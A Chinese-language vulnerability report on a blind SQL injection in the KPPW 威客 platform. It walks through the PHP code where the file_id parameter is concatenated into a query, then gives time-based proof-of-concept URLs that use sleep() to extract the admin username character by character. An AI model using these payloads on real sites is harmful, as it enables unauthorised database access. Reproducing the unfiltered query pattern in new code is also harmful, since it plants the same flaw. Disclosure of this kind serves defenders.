VULHUB ™

### 简要描述： kppw威客系统SQL盲注漏洞 ### 详细说明： 文件：/control/ajax/ajax_file.php ``` case "delete": $res = keke_file_class::del_att_file($file_id, $filepath); $res and kekezu::echojson ( '', '1' ) or kekezu::echojson ( '', '0' ); die (); break; ``` 进入del_att_file函数： static function del_att_file($fid = 0, $filepath = '', $del_more = '') { $file_obj = new Keke_witkey_file_class (); if ($fid > 0) { $where = 'file_id=' . $fid; $filepath != '' && $where .= ' and save_name="' . $filepath . '"'; $file_obj->setWhere ( $where ); $file_info = $file_obj->query_keke_witkey_file (); $file_obj->setWhere ( $where ); $res = $file_obj->del_keke_witkey_file (); $filepath = $file_info [0] ['save_name']; if (is_file ( $filepath )) { $unlink = unlink ( $filepath ); if ($del_more != '') { $more_name = array (); $dirname = dirname ( $filepath ); $dirname = $dirname . '/'; $basename = basename ( $filepath ); $size_arr = explode ( ',', $del_more ); for($i = 0; $i < sizeof ( $size_arr ); $i ++) { unlink ( $dirname ....

### 简要描述： kppw威客系统SQL盲注漏洞 ### 详细说明： 文件：/control/ajax/ajax_file.php ``` case "delete": $res = keke_file_class::del_att_file($file_id, $filepath); $res and kekezu::echojson ( '', '1' ) or kekezu::echojson ( '', '0' ); die (); break; ``` 进入del_att_file函数： static function del_att_file($fid = 0, $filepath = '', $del_more = '') { $file_obj = new Keke_witkey_file_class (); if ($fid > 0) { $where = 'file_id=' . $fid; $filepath != '' && $where .= ' and save_name="' . $filepath . '"'; $file_obj->setWhere ( $where ); $file_info = $file_obj->query_keke_witkey_file (); $file_obj->setWhere ( $where ); $res = $file_obj->del_keke_witkey_file (); $filepath = $file_info [0] ['save_name']; if (is_file ( $filepath )) { $unlink = unlink ( $filepath ); if ($del_more != '') { $more_name = array (); $dirname = dirname ( $filepath ); $dirname = $dirname . '/'; $basename = basename ( $filepath ); $size_arr = explode ( ',', $del_more ); for($i = 0; $i < sizeof ( $size_arr ); $i ++) { unlink ( $dirname . $size_arr [$i] . '_' . $basename ); } } } return $unlink ? $unlink : $res; } 进入query_keke_witkey_file函数： ``` function query_keke_witkey_file($is_cache=0, $cache_time=0){ if($this->_where){ $sql = "select * from $this->_tablename where ".$this->_where; } else{ $sql = "select * from $this->_tablename"; } if ($is_cache) { $this->_cache_config ['is_cache'] = $is_cache; } if ($cache_time) { $this->_cache_config ['time'] = $cache_time; } if ($this->_cache_config ['is_cache']) { if (CACHE_TYPE) { $keke_cache = new keke_cache_class ( CACHE_TYPE ); $id = $this->_tablename . ($this->_where?"_" .substr(md5 ( $this->_where ),0,6):''); $data = $keke_cache->get ( $id ); if ($data) { return $data; } else { $res = $this->_dbop->query ( $sql ); $keke_cache->set ( $id, $res,$this->_cache_config['time'] ); $this->_where = ""; return $res; } } }else{ $this->_where = ""; return $this->_dbop->query ( $sql ); } } ``` 在拼接SQL语句时： $where = 'file_id=' . $fid; $sql = "select * from $this->_tablename where ".$this->_where; file_id没有过滤，导致sql注入。 ### 漏洞证明： 利用证明： ``` http://127.0.0.1/kppw/index.php?do=ajax&view=file&ajax=delete&file_id=1 and if(substr((select username from keke_witkey_member where uid=1),1,1)=0x61,sleep(5), 1)%23&filepath=123 ``` 返回正常。 ``` http://127.0.0.1/kppw/index.php?do=ajax&view=file&ajax=delete&file_id=1 and if(substr((select username from keke_witkey_member where uid=1),1,1)=0x62,sleep(5), 1)%23&filepath=123 ``` 返回错误，延迟5秒后返回